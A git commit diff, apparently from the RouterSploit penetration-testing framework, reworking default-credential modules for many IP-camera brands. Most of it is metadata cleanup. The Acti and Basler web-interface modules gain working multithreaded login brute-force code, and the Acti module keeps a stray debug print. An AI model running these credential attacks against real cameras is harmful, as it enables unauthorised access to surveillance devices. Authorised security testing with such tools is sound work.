Unverified Commit 8bc9cf1d by Marcin Bury Committed by GitHub

Adding telnet creds tests (#423)

parent 541ba37f
...@@ -33,6 +33,9 @@ class Exploit(HTTPClient): ...@@ -33,6 +33,9 @@ class Exploit(HTTPClient):
return return
print_status("Starting default credentials attack against Acti Camera Web Interface") print_status("Starting default credentials attack against Acti Camera Web Interface")
data = LockedIterator(self.defaults)
print(data.next())
self.run_threads(self.threads, self.target_function, data) self.run_threads(self.threads, self.target_function, data)
if self.credentials: if self.credentials:
...@@ -42,8 +45,31 @@ class Exploit(HTTPClient): ...@@ -42,8 +45,31 @@ class Exploit(HTTPClient):
else: else:
print_error("Credentials not found") print_error("Credentials not found")
def target_function(self, data): def target_function(self, running, creds):
pass while running.is_set():
try:
username, password = creds.next().split(":")
data = {
"LOGIN_ACCOUNT": username,
"LOGIN_PASSWORD": password,
"LANGUAGE": "0",
"btnSubmit": "Login",
}
response = self.http_request(
method="POST",
path="/video.htm",
data=data
)
if response is None:
continue
if ">Password<" not in response.text:
self.credentials.append((self.target, self.port, self.target_protocol, username, password))
except StopIteration:
break
def check(self): def check(self):
response = self.http_request( response = self.http_request(
...@@ -61,7 +87,8 @@ class Exploit(HTTPClient): ...@@ -61,7 +87,8 @@ class Exploit(HTTPClient):
if self.check(): if self.check():
self.credentials = [] self.credentials = []
self.run_threads(self.threads, self.target_function, self.defaults) data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
if self.credentials: if self.credentials:
return self.credentials return self.credentials
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Avigilon Camera Default SSH Creds", "name": "Avigilon Camera Default SSH Creds",
"description": "Module performs dictionary attack against Avigilon Camera SSH service. " "description": "Module performs dictionary attack against Avigilon Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Avigilon Camera", "Avigilon Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Avigilon Camera Default Telnet Creds", "name": "Avigilon Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Avigilon Camera Telnet service. " "description": "Module performs dictionary attack against Avigilon Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Avigilon Camera", "Avigilon Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Avtech Camera Default FTP Creds", "name": "Avtech Camera Default FTP Creds",
"description": "Module performs dictionary attack against Avtech Camera FTP service. " "description": "Module performs dictionary attack against Avtech Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Avtech Camera", "Avtech Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Avtech Camera Default SSH Creds", "name": "Avtech Camera Default SSH Creds",
"description": "Module performs dictionary attack against Avtech Camera SSH service. " "description": "Module performs dictionary attack against Avtech Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Avtech Camera", "Avtech Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Avtech Camera Default Telnet Creds", "name": "Avtech Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Avtech Camera Telnet service. " "description": "Module performs dictionary attack against Avtech Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Avtech Camera", "Avtech Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Axis Camera Default FTP Creds", "name": "Axis Camera Default FTP Creds",
"description": "Module performs dictionary attack against Axis Camera FTP service. " "description": "Module performs dictionary attack against Axis Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Axis Camera", "Axis Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Axis Camera Default SSH Creds", "name": "Axis Camera Default SSH Creds",
"description": "Module performs dictionary attack against Axis Camera SSH service. " "description": "Module performs dictionary attack against Axis Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Axis Camera", "Axis Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Axis Camera Default Telnet Creds", "name": "Axis Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Axis Camera Telnet service. " "description": "Module performs dictionary attack against Axis Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Axis Camera", "Axis Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(HTTPBasicDigestDefault): ...@@ -7,12 +7,12 @@ class Exploit(HTTPBasicDigestDefault):
"name": "Axis Camera Default Web Interface Creds - HTTP Auth", "name": "Axis Camera Default Web Interface Creds - HTTP Auth",
"description": "Module performs dictionary attack against Axis Camera Web Interface. " "description": "Module performs dictionary attack against Axis Camera Web Interface. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Axis Camera", "Axis Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Basler Camera Default FTP Creds", "name": "Basler Camera Default FTP Creds",
"description": "Module performs dictionary attack against Basler Camera FTP service. " "description": "Module performs dictionary attack against Basler Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Basler Camera", "Basler Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Basler Camera Default SSH Creds", "name": "Basler Camera Default SSH Creds",
"description": "Module performs dictionary attack against Basler Camera SSH service. " "description": "Module performs dictionary attack against Basler Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Basler Camera", "Basler Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Basler Camera Default Telnet Creds", "name": "Basler Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Basler Camera Telnet service. " "description": "Module performs dictionary attack against Basler Camera Telnet service. "
"If valid credentials are found, they are displayed to the user. ", "If valid credentials are found, they are displayed to the user. ",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com", # routersploit module "Marcin Bury <marcin[at]threat9.com", # routersploit module
], ),
"devices": [ "devices": (
"Basler Camera", "Basler Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port(file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port(file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(HTTPClient): ...@@ -7,12 +7,12 @@ class Exploit(HTTPClient):
"name": "Basler Camera Default Web Interface Creds - HTTP Form", "name": "Basler Camera Default Web Interface Creds - HTTP Form",
"description": "Module performs dictionary attack against Basler Camera Web Interface. " "description": "Module performs dictionary attack against Basler Camera Web Interface. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Basler Camera", "Basler Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
...@@ -35,6 +35,7 @@ class Exploit(HTTPClient): ...@@ -35,6 +35,7 @@ class Exploit(HTTPClient):
print_status("Starting default creds attack against web interface") print_status("Starting default creds attack against web interface")
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data) self.run_threads(self.threads, self.target_function, data)
if self.credentials: if self.credentials:
...@@ -44,14 +45,52 @@ class Exploit(HTTPClient): ...@@ -44,14 +45,52 @@ class Exploit(HTTPClient):
else: else:
print_error("Credentials not found") print_error("Credentials not found")
def target_function(self, data): def target_function(self, running, creds):
pass while running.is_set():
try:
username, password = creds.next().split(":")
data = {
"Auth.Username": username,
"Auth.Password": password,
}
response = self.http_request(
method="POST",
path="/cgi-bin/auth_if.cgi?Login",
data=data
)
if response and "success: true" in response.text:
self.credentials.append((self.target, self.port, self.target_protocol, username, password))
except StopIteration:
break
@mute
def check(self): def check(self):
data = {
"Auth.Username": "",
"Auth.Password": "",
}
response = self.http_request(
method="POST",
path="/cgi-bin/auth_if.cgi?Login",
data=data
)
if response and "success: " in response.text:
return True
return False return False
@mute @mute
def check_default(self): def check_default(self):
return None if self.check():
self.credentials = []
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
if self.credentials:
return self.credentials
return None
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Brickcom Camera Default FTP Creds", "name": "Brickcom Camera Default FTP Creds",
"description": "Module performs dictionary attack against Brickcom Camera FTP servie. " "description": "Module performs dictionary attack against Brickcom Camera FTP servie. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Brickcom Camera", "Brickcom Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Brickcom Camera Default SSH Creds", "name": "Brickcom Camera Default SSH Creds",
"description": "Module performs dictionary attack against Brickcom Camera SSH service. " "description": "Module performs dictionary attack against Brickcom Camera SSH service. "
"If valid credentials are found they are displayed to the user. ", "If valid credentials are found they are displayed to the user. ",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Brickcom Camera", "Brickcom Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Brickcom Camera Telnet Creds", "name": "Brickcom Camera Telnet Creds",
"description": "Module performs dictionary attack against Brickcom Camera Telnet service. " "description": "Module performs dictionary attack against Brickcom Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"brickcom Camera", "Brickcom Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(HTTPBasicDigestDefault): ...@@ -7,12 +7,12 @@ class Exploit(HTTPBasicDigestDefault):
"name": "Brickcom Camera Default Web Interface Creds - HTTP Auth", "name": "Brickcom Camera Default Web Interface Creds - HTTP Auth",
"description": "Module performs dictionary attack against Brickcom Camera. " "description": "Module performs dictionary attack against Brickcom Camera. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Brickcom Camera", "Brickcom Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Canon Camera Default FTP Creds", "name": "Canon Camera Default FTP Creds",
"description": "Module performs dictionary attack against Canon Camera FTP service. " "description": "Module performs dictionary attack against Canon Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Canon Camera", "Canon Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Canon Camera Default SSH Creds", "name": "Canon Camera Default SSH Creds",
"description": "Module performs dictionary attack against Canon Camera SSH service. " "description": "Module performs dictionary attack against Canon Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Canon Camera", "Canon Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Canon Camera Default Telnet Creds", "name": "Canon Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Canon Camera Telnet service. " "description": "Module performs dictionary attack against Canon Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Canon Camera", "Canon Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -11,7 +11,7 @@ class Exploit(HTTPBasicDigestDefault): ...@@ -11,7 +11,7 @@ class Exploit(HTTPBasicDigestDefault):
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": ( "devices": (
"Canon Camera" "Canon Camera",
) )
} }
......
...@@ -6,12 +6,12 @@ class Exploit(FTPDefault): ...@@ -6,12 +6,12 @@ class Exploit(FTPDefault):
__info__ = { __info__ = {
"name": "Cisco Camera Default FTP Creds", "name": "Cisco Camera Default FTP Creds",
"description": "Module performs dictionary attack against Cisco Camera FTP service.", "description": "Module performs dictionary attack against Cisco Camera FTP service.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Cisco Camera", "Cisco Camera",
] )
} }
target = OptIP("", "Taret IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Taret IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Canon Camera Default SSH Creds", "name": "Canon Camera Default SSH Creds",
"description": "Module performs dictionary attack against Canon Camera SSH service. " "description": "Module performs dictionary attack against Canon Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin BUyr <marcin[at]threat9.com>", "Marcin Bury <marcin[at]threat9.com>",
], ),
"devices": [ "devices": (
"Canon Camera", "Canon Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Canon Camera Default Telnet Creds", "name": "Canon Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Canon Camera Telnet service." "description": "Module performs dictionary attack against Canon Camera Telnet service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", "Marcin Bury <marcin[at]threat9.com>",
], ),
"devices": [ "devices": (
"Canon Camera", "Canon Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "D-Link Camera Default FTP Creds", "name": "D-Link Camera Default FTP Creds",
"description": "Module performs dictionary attack against D-Link Camera FTP service." "description": "Module performs dictionary attack against D-Link Camera FTP service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"D-Link Camera", "D-Link Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "D-Link Camera Default SSH Creds", "name": "D-Link Camera Default SSH Creds",
"description": "Module performs dictionary attack against D-Link Camera SSH service." "description": "Module performs dictionary attack against D-Link Camera SSH service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", "Marcin Bury <marcin[at]threat9.com>",
], ),
"devices": [ "devices": (
"D-Link Camera", "D-Link Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "D-Link Camera Default Telnet Creds", "name": "D-Link Camera Default Telnet Creds",
"description": "Module performs dictionary attack against D-Link Camera Telnet service." "description": "Module performs dictionary attack against D-Link Camera Telnet service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"D-Link Camera", "D-Link Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "GeoVision Camera Default FTP Creds", "name": "GeoVision Camera Default FTP Creds",
"description": "Module performs dictioanry attack against GeoVision Camera FTP service. " "description": "Module performs dictioanry attack against GeoVision Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"GeoVision Camera", "GeoVision Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "GeoVision Camera Default SSH Creds", "name": "GeoVision Camera Default SSH Creds",
"description": "Module performs dictionary attack against GeoVision Camera SSH service." "description": "Module performs dictionary attack against GeoVision Camera SSH service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"GeoVision Camera", "GeoVision Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "GeoVision Camera Default Telnet Creds", "name": "GeoVision Camera Default Telnet Creds",
"description": "Module performs dictionary attack against GeoVision Camera Telnet service. " "description": "Module performs dictionary attack against GeoVision Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"GeoVision Camera", "GeoVision Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Grandstream Camera Default FTP Creds", "name": "Grandstream Camera Default FTP Creds",
"description": "Module performs dictionary attack against Grandstream Camera FTP service. " "description": "Module performs dictionary attack against Grandstream Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Grandstream Camera", "Grandstream Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Grandstream Camera Default SSH Creds", "name": "Grandstream Camera Default SSH Creds",
"description": "Module performs dictionary attack against Grandstream Camera SSH service. " "description": "Module performs dictionary attack against Grandstream Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Grandstream Camera", "Grandstream Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Grandstream Camera Default Telnet Creds", "name": "Grandstream Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Grandstream Camera Telnet service. " "description": "Module performs dictionary attack against Grandstream Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com", # routersploit module "Marcin Bury <marcin[at]threat9.com", # routersploit module
], ),
"devices": [ "devices": (
"Grandstream Camera", "Grandstream Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Hikvision Camera FTP Creds", "name": "Hikvision Camera FTP Creds",
"description": "Module performs dictionary attack against Hikvision Camera FTP service. " "description": "Module performs dictionary attack against Hikvision Camera FTP service. "
"If valid credentials are found, they displayed to the user.", "If valid credentials are found, they displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Hikvision Camera", "Hikvision Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Hikvision Camera Default SSH Creds", "name": "Hikvision Camera Default SSH Creds",
"description": "Module performs dictionary attack against Hikvision Camera SSH service. " "description": "Module performs dictionary attack against Hikvision Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Hikvision Camera" "Hikvision Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port(file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port(file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Hikvision Camera Default Telnet Creds", "name": "Hikvision Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Hikvision Camera Telnet service. " "description": "Module performs dictionary attack against Hikvision Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Hikvision Camera", "Hikvision Camera",
], ),
} }
